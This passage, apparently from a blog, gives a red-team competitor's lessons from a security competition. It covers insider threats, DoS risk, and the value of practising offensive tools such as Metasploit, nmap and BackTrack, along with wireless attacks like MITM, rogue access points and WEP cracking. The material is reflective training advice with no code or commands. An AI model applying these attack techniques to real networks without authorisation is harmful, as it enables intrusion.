- While the red team had a lot of talent in one room, I still wouldn't consider any of them black hat hackers by any means. Most were still students, and only a handful were security professionals. The skillsets only go so far, but the real world can throw any level of skills at you.

- Attacks can still come from within. Pretty much out of scope was social engineering on any scale that would allow unsupervised physical access to systems. Also, attacks on clients such as emailed trojans was not really possible. There really weren't that many systems on the inside to dupe and gain a foothold. This was more like attacking a standalone DMZ. But don't forget every system and user is a target.

- DoS attacks are still debilitating and not only can end your night quickly in a competition, but can close a business just as quickly in the real world. And for as debilitating as a DoS attack is, it is typically the least planned-for and one of the harder attacks to thwart, in theory. (Ok, DDoS is harder, just to pre-empt commentors saying it is easy!)

Personal lessons
I'm out of practice. A competition is not the place to fire up Metasploit 3 for the first time (although thankfully I have used Metasploit 2 in the past). Likewise, know general tools to use for basic stuff, and practice them. Domain transfers, nmap scanning, OS/service fingerprinting (both from a scanner but also from just using the services, like Apache running on Ubuntu). I'm rusty on almost everything, so practicing is definitely in order. It's just one of those things I don't get to do on a daily basis on the job (or even weekly or monthly!). Know BackTrack tools inside and out. Be familiar with wireless attacks both as an associated client (airpwn, hamster/ferret, rogue AP, MITM) and as an outside attacker (DoS, WEP cracking, IV generation). Knowing these things well up front goes a long way to being an efficient attacker. Just like the defenders, attackers need to know the fundamentals, and practice them regularly. This can lead to less time spent relearning tools or settings, and more time being surgical and more creative. It can also mean less jubilation at low-level triumphs; rather thinking how to leverage those hidden lower triumphs to get the most gain over the long run.